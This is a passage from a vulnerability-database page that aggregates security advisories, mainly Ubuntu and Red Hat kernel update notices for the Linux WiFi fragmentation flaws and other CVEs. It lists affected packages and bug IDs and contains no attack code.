        "id": "109299"
      },
      {
        "date": "2011-11-09T18:56:12",
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "date": "2011-09-21T14:30:14",
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "date": "2011-09-14T05:16:17",
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "date": "2011-05-25T14:08:37",
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "date": "2011-08-20T00:00:39",
        "db": "PACKETSTORM",
        "id": "104250"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2012-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "date": "2012-06-21T23:55:02.097000",
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2012-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2023-02-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "date": "2023-02-13T04:29:03.420000",
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "104250"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hitachi JP1 Cross-site scripting vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Input Validation Error",
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      }
    ],
    "trust": 0.9
  }
}

var-202105-1475
Vulnerability from variot

An issue was discovered in the Linux kernel 5.8.9. The WEP, WPA, WPA2, and WPA3 implementations reassemble fragments even though some of them were sent in plaintext. This vulnerability can be abused to inject packets and/or exfiltrate selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021

linux-kvm vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 21.04

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04.

Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. (CVE-2020-24586)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled encrypted fragments. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. (CVE-2020-26141)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation accepted plaintext fragments in certain situations. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26147)

Or Cohen discovered that the SCTP implementation in the Linux kernel contained a race condition in some situations, leading to a use-after-free condition. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)

Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-31829)

It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)

Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. A local attacker could use this issue to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3543)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609

Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9

. Bugs fixed (https://bugzilla.redhat.com/):

2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)

  1. Solution:

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1509204 - dlm: Add ability to set SO_MARK on DLM sockets 1793880 - Unreliable RTC synchronization (11-minute mode) 1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10 1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity 1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free 1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() 1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value 1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c 1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure 1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers 1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers 1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers 1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict ' 1939341 - CNB: net: add inline function skb_csum_is_sctp 1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode 1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c 1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c 1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS 1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c 1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del 1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory 1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP 1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. 1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory 1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation 1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection 1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys 1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame 1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client 1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks 1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames 1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks 1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header 1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames 1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers 1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments 1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h 1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs 1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails 1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls 1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier 1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl() 1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c 1971101 - ceph: potential data corruption in cephfs write_begin codepath 1972278 - libceph: allow addrvecs with a single NONE/blank address 1974627 - [TIPC] kernel BUG at lib/list_debug.c:31! 1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0] 1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c 1976679 - blk-mq: fix/improve io scheduler batching dispatch 1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00 1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116) 1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame 1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel 1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level 1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature 1978369 - dm writecache: sync with upstream 5.14 1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?) 1979680 - Backport openvswitch tracepoints 1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod 1986138 - Lockd invalid cast to nlm_lockowner 1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty() 1989999 - ceph omnibus backport for RHEL-8.5.0 1991976 - block: fix New warning in nvme_setup_discard 1992700 - blk-mq: fix kernel panic when iterating over flush request 1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files 1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-348.el8.src.rpm

aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm

ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm

x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert FluentdNodeDown always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
